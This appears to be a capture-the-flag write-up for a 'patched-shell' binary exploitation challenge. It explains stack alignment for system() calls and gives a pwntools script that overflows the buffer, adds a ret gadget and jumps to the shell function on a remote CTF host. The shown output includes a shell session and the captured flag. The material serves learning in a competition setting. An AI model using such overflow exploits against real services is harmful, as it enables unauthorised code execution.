Okay, okay. So you were smart enough to do basic overflow huh...
Now try this challenge! I patched the shell function so it calls system instead of execve... so now your exploit shouldn't work! bwahahahahaha
Note: due to the copycat nature of this challenge, it suffers from the same bug that was in basic-overflow. see the cryptic message there for more information.
gdb-peda$ i functions
All defined functions:
Non-debugging symbols:
0x0000000000401000 _init
0x0000000000401030 system@plt
0x0000000000401040 gets@plt
0x0000000000401050 _start
0x0000000000401080 _dl_relocate_static_pie
0x0000000000401136 shell
0x000000000040114c main
0x000000000040116c _finiWhen using the basic-overflow chall payload and calling system, SIGSEGV occurs.
This is because some of the 64 bit libc functions require the stack to be 16-byte aligned, the address of $rsp should ending with 0, when they are called.
To resolve this, I add an extra ret (0x40101a) in the beginning of ROP chain. When ret is invoked, it increments $rsp by 8.
from pwn import *
# p = process('./patched-shell')
p = remote('34.134.173.142', 5000)
ret = 0x40101a
payload = b"A"*72 + p64(ret) + p64(0x0000000000401136)
p.sendline(payload)
p.interactive()
"""
[+] Opening connection to 34.134.173.142 on port 5000: Done
[*] Switching to interactive mode
$ ls
flag
run
$ cat flag
uoftctf{patched_the_wrong_function}
"""